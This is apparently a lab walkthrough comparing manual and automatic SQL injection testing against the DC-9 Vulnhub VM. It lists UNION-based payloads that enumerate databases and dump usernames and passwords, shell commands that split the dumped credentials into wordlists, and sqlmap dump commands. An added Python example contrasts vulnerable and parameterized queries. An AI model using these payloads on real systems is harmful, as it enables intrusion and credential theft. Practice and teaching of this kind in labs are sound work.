Manual vs automatic testing for SQL injection
Overview
An SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application.
A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.
Manual vs automatic testing
Manual testing consists of crafting SQL input by hand to generate errors or to alter the intended execution of the application's queries.
Automatic testing applies the same principles but with automated tools; the go-to tool for SQLi is sqlmap.
Note:
sqlmap is not allowed in some certification exams, such as the OSCP, and even when you use it outside an exam you need to know what is happening behind the scenes.
Application
We used the DC-9 VM from Vulnhub, which contains a search page that is vulnerable to SQLi.
You can download the VM from Vulnhub to follow along with me.
NB: you can use the browser or Burp to perform these tests.
1> Manual Testing
1. Find the number of columns in the query
Repeat this input, adding one column each time, until the server returns a result instead of an error:
' UNION SELECT 1 #
' UNION SELECT 1,2 #
' UNION SELECT 1,2,3 #
' UNION SELECT 1,2,3,4,... #
' UNION SELECT 1,2,3,4,5,6 #
2. Find DB version: (@@version)
' union select 1,2,3,4,5,@@version #
3. Find database names (concat(schema_name))
' union select 1,2,3,4,5,concat(schema_name) FROM information_schema.schemata #
4. Find table names (concat(TABLE_NAME))
A/ DB=Staff
' union SELECT 1,2,3,4,5,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema='Staff' #
B/ DB=users
' union SELECT 1,2,3,4,5,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema='users' #
5. Find the column names of a table: (information_schema.columns)
A/ TABLE=StaffDetails
' union SELECT 1,2,3,4,5,column_name FROM information_schema.columns WHERE table_name = 'StaffDetails' #
B/ TABLE=Users
' union SELECT 1,2,3,4,5,column_name FROM information_schema.columns WHERE table_name = 'Users' #
C/ TABLE=UserDetails
' union SELECT 1,2,3,4,5,column_name FROM information_schema.columns WHERE table_name = 'UserDetails' #
Results:
Number of columns: 6
DB version: 10.3.17-MariaDB-0+deb10u1
Databases / tables / columns:
information_schema (default)
Staff
    StaffDetails: id, firstname, lastname, position, phone, reg_date
    Users: UserID, Username, Password
users
    UserDetails: id, firstname, lastname, username, password, reg_date
6. Dump data: (group_concat(username," | ",password))
' union select 1,2,3,4,5,group_concat(username," | ",password) From users.UserDetails #
Save the returned list to a file named creds and split it into user and password lists:
cat creds | tr "," "\n" | cut -d " " -f 1 > user
cat creds | tr "," "\n" | cut -d " " -f 3 > pass
' union select 1,2,3,4,5,group_concat(username," | ",password) From Staff.Users #
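To show why the UNION enumeration above works and how a parameterized query stops it, here is an added Python example (not code from the original post or from the DC-9 VM). It uses a constructed in-memory SQLite copy of the table layout found above in place of the real MariaDB search page, so the comment marker is `--` rather than `#`, and runs the step 1 column-count probe against a string-concatenated query and against a bound-parameter query.

```python
import sqlite3

# Constructed stand-in for the DC-9 search page: an in-memory SQLite database with the
# column layout the manual enumeration found (StaffDetails: 6 columns; Users: 3); rows
# are made up. SQLite takes "--" as a comment where MariaDB payloads use "#", "||" for concat.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE StaffDetails (id, firstname, lastname, position, phone, reg_date)")
    conn.executemany("INSERT INTO StaffDetails VALUES (?,?,?,?,?,?)", [
        (1, "Mary", "Moe", "Reception", "46478415155", "2019-05-01"),
        (2, "Julie", "Dooley", "Sales", "46457131278", "2019-05-02"),
    ])
    conn.execute("CREATE TABLE Users (UserID, Username, Password)")
    conn.execute("INSERT INTO Users VALUES (1, 'admin', 'placeholder-hash')")
    return conn

def search_vulnerable(conn, term):
    # Input spliced into the SQL text: a quote closes the string literal and the
    # rest of the input is parsed as SQL. This is the bug the walkthrough exploits.
    sql = f"SELECT * FROM StaffDetails WHERE lastname LIKE '%{term}%'"
    return conn.execute(sql).fetchall()

def search_parameterized(conn, term):
    # The fix: bind the term as a parameter. The driver sends it as data and the
    # database never parses it as SQL, whatever characters it contains.
    sql = "SELECT * FROM StaffDetails WHERE lastname LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()

def union_probe(n):
    # Step 1 of the manual test: a UNION whose width must match the original query.
    return "' UNION SELECT " + ",".join(str(i) for i in range(1, n + 1)) + " -- "

def find_column_count(conn, search, limit=10):
    # Repeats the probe as the page does. Returns the first width that raises no
    # error and echoes the marker row, or None when the endpoint gives no signal.
    for n in range(1, limit + 1):
        try:
            rows = search(conn, union_probe(n))
        except sqlite3.OperationalError:
            continue  # "SELECTs ... do not have the same number of result columns"
        if tuple(range(1, n + 1)) in rows:
            return n
    return None

# Step 6 equivalent: read a second table through the same hole.
DUMP_PAYLOAD = "' UNION SELECT 1,2,3,4,5,Username || ' | ' || Password FROM Users -- "

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", find_column_count(db, search_vulnerable))        # 6
    print("parameterized:", find_column_count(db, search_parameterized))  # None
```

The parameterized search returns nothing for every probe and never errors, which is exactly the "no signal" a tester sees on a correctly written endpoint.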
2> Automatic Testing
Let's capture the request using Burp.
Copy and paste the full request into a file on your Kali machine and run sqlmap on it:
sqlmap -r request --dump --batch --dbs
sqlmap -r request --dump --batch --dbs -D Staff
sqlmap -r request --dump --batch --dbs -D users
I copied this to a file named creds
cat creds| cut -d "|" -f 6 | cut -d " " -f 2 > user
cat creds| cut -d "|" -f 4 | cut -d " " -f 2 > pass
Use sed -i "Nd" (N = line number) to delete unwanted lines.
Same results!